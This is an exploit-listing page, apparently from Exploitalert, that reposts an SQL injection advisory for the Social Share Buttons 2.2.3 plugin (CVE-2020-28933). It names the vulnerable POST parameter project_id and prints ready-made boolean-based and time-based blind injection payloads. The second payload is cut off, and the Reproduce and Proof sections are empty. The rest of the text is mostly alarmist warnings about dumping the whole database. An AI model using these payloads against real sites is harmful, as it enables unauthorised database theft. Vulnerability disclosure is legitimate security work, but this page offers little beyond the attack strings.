Social Share Button 2.2.3 SQL Injection

CVE Category Price Severity
CVE-2020-28933 CWE-89 $2000 Critical
Author Risk Exploitation Type Date
FullPilim High Remote 2022-09-16

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

Social Share Button 2.2.3 SQL Injection
## Title: Social Share Buttons-2.2.3 SQLi
## Author: nu11secur1ty
## Date: 09.16.2022
## Vendor:
## Software:
## Reference:

## Description:
The `project_id` parameter from the Social Share Buttons-2.2.3 system
appears to be vulnerable to SQL injection attacks.
The malicious user can dump-steal the database, from this system and
he can use it for very malicious purposes.
WARNING: The attacker can retrieve all-database from this system!
NOTE: The users of this system are NOT protected, this SQL
vulnerability is CRITICAL!

STATUS: HIGH Vulnerability


Parameter: project_id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=social-sharing-share&project_id=378116348' or
'3724'='3724' AND 7995=7995 AND 'rQVH'='rQVH&network_id=5&post_id=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=social-sharing-share&project_id=378116348' or
'3724'='3724' AND (SELECT 9167 FROM (SELECT(SLEEP(5)))dQDw) AND

## Reproduce:

## Proof and Exploit:

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.